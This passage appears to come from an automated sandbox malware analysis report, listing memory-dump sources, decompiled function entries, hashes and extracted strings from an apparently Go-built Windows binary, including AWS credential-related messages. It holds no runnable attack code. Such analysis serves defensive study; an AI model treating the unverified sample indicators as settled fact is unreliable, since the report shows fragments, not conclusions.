              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: npages= nalloc= nfreed=runtime.[signal reflect. newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUplo$"$runtime: inUse=runtime: max = bad panic stackrecovery failedstopm holding pstartm: m has ppreempt SPWRITEmissing mcache?ms: gomaxprocs=randinit missed]morebuf={pc:: no frame (sp=runtime: frame runtimer: bad ptraceback stuckruntime.gopanicadvertise errorkey h$too many pages allocated in chunk?mspan.ensureSwept: m is not lockedVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timertoo many references: c
              • API String ID: 0-4281611166
              • Opcode ID: 63a4a297a2ee92926a01bb51c2ecc808c957681fd8810d2dc7b1b83531631a30
              • Instruction ID: a2ef57c788f7cf57ede1400ed93693a84afd9ccfa27f32585725ab97f7870ad9
              • Opcode Fuzzy Hash: 63a4a297a2ee92926a01bb51c2ecc808c957681fd8810d2dc7b1b83531631a30
              • Instruction Fuzzy Hash: 93213874118340DEC305EF24D09976ABBE0FF85704F05C96DE499876A2D7389858DB23
              Function 007B5950 Relevance: 5.1, Strings: 4, Instructions: 53COMMON
              Download Yara Rule
              Strings
              • runtime: netpoll: PostQueuedCompletionStatus failedfatal: systemstack called from unexpected goroutinebucket name %s is not compatible with S3 Accelerategodebug: Value of name not listed in godebugs.All: crypto/tls: reserved ExportKeyingMaterial label: %stls: , xrefs: 007B5A24
              • 3, xrefs: 007B5A2D
              • runtime: netpoll: PostQueuedCompletionStatus failed (errno= runtime: GetQueuedCompletionStatusEx returned invalid mode= AWS_ACCESS_KEY_ID or AWS_ACCESS_KEY not found in environmentreflect: call of reflect.Value.Len on ptr to non-array Valuetls: no supported ve, xrefs: 007B59DF
              • ) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14St, xrefs: 007B5A09
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: ) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14St$3$runtime: netpoll: PostQueuedCompletionStatus failed (errno= runtime: GetQueuedCompletionStatusEx returned invalid mode= AWS_ACCESS_KEY_ID or AWS_ACCESS_KEY not found in environmentreflect: call of reflect.Value.Len on ptr to non-array Valuetls: no supported ve$runtime: netpoll: PostQueuedCompletionStatus failedfatal: systemstack called from unexpected goroutinebucket name %s is not compatible with S3 Accelerategodebug: Value of name not listed in godebugs.All: crypto/tls: reserved ExportKeyingMaterial label: %stls:
              • API String ID: 0-2551176156
              • Opcode ID: 61b55d9c8cb35476609e032ad64936936e74ef579fe0742e6b5a3c191c242e6c
              • Instruction ID: 58100427fcb490d25a095dbe6f7e1ff76dad49946db4148413df2e85a679d925
              • Opcode Fuzzy Hash: 61b55d9c8cb35476609e032ad64936936e74ef579fe0742e6b5a3c191c242e6c
              • Instruction Fuzzy Hash: E92103B4108705DFD301EF24D0997AEBBE4FB88344F40885DE48887352EB799958CBA3
              Function 007961F0 Relevance: 5.0, Strings: 4, Instructions: 45COMMON
              Download Yara Rule
              Strings
              • , xrefs: 0079629D
              • runtime: failed to release pagesruntime: fixalloc size too largeinvalid limiter event type foundscanstack: goroutine not stoppedscavenger state is already wiredsweep increased allocation countremovespecial on invalid pointerruntime: root level max pages = WSAG, xrefs: 00796294
              • bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplockedm: not runnablereleasep: , xrefs: 00796260
              • runtime: VirtualFree of /cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of memoryruntime: p.searchAdd, xrefs: 00796236
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: $ bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplockedm: not runnablereleasep: $runtime: VirtualFree of /cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of memoryruntime: p.searchAdd$runtime: failed to release pagesruntime: fixalloc size too largeinvalid limiter event type foundscanstack: goroutine not stoppedscavenger state is already wiredsweep increased allocation countremovespecial on invalid pointerruntime: root level max pages = WSAG
              • API String ID: 0-3511914922
              • Opcode ID: d41182816f2701bcb6b6d660436791602de2a13004425acfa0553703786fafea
              • Instruction ID: 966182579d082090f82ce713a33e2bb467d370c64d2bf508ae040899a7dd4059
              • Opcode Fuzzy Hash: d41182816f2701bcb6b6d660436791602de2a13004425acfa0553703786fafea
              • Instruction Fuzzy Hash: 6D119BB4109705DFD341FFA8D58979EBBE4BB88704F40881DE48893241EB7899489B63